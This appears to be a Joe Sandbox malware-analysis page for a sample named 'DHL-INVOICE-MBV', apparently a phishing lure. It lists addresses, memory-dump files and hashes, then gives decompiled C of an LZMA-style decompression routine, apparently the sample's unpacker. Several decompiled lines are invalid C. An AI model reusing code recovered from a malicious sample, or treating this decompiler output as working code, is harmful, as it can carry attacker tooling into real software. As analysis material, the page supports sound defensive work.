0x00406b8f
0x00406b91
0x00406b94
0x00406b97
0x00406b9a
0x00406b9c
0x00406b9c
0x00406b9c
0x00000000
0x00000000
0x00406cfe
0x00406cfe
0x00406d02
0x004071c8
0x00000000
0x004071c8
0x00406d08
0x00406d0b
0x00406d0e
0x00406d11
0x00406d13
0x00406d13
0x00406d13
0x00406d16
0x00406d19
0x00406d1c
0x00406d1f
0x00406d22
0x00406d25
0x00406d26
0x00406d28
0x00406d28
0x00406d28
0x00406d2b
0x00406d2e
0x00406d31
0x00406d34
0x00406d34
0x00406d34
0x00406d37
0x00406d39
0x00406d39
0x00000000
0x00000000
0x00406f7b
0x00406f7b
0x00406f7b
0x00406f7f
0x00000000
0x00000000
0x00406f85
0x00406f88
0x00406f8b
0x00406f8e
0x00406f90
0x00406f90
0x00406f90
0x00406f93
0x00406f96
0x00406f99
0x00406f9c
0x00406f9f
0x00406fa2
0x00406fa3
0x00406fa5
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb8
0x00406fba
0x00406fbd
0x00000000
0x00406fbf
0x00406d3c
0x00406d3c
0x00000000
0x00406d3c
0x00406fbd
0x004071f2
0x00407214
0x0040721a
0x0040721c
0x00407223
0x00407225
0x0040722c
0x00407230
0x00000000
0x00406821
0x00407229
0x00407229
0x00000000
0x00407229
0x00407076
0x004070fc
0x00407102
0x00407105
0x00407108
0x0040710b
0x0040710e
0x00407111
0x00407114
0x00407117
0x0040711d
0x00407136
0x00407139
0x0040713c
0x0040713f
0x00407143
0x00407145
0x00407146
0x00407149
0x0040711f
0x0040711f
0x00407127
0x0040712c
0x0040712e
0x00407131
0x00407131
0x00407153
0x00000000
0x00407155
0x00000000
0x00407155
0x00407153
0x00000000
0x00406fc8

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
Instruction ID: 90999bc76b255a60827136b2fd47affe8781ac3d45706895e3c6f95813f0c94e
Opcode Fuzzy Hash: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
Instruction Fuzzy Hash: 21913F71D04229CBDB28CF98C8547ADBBB1FF44305F14816ED456BB291C378AA86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406CDA Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406CDA() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407231))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4)); // executed
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
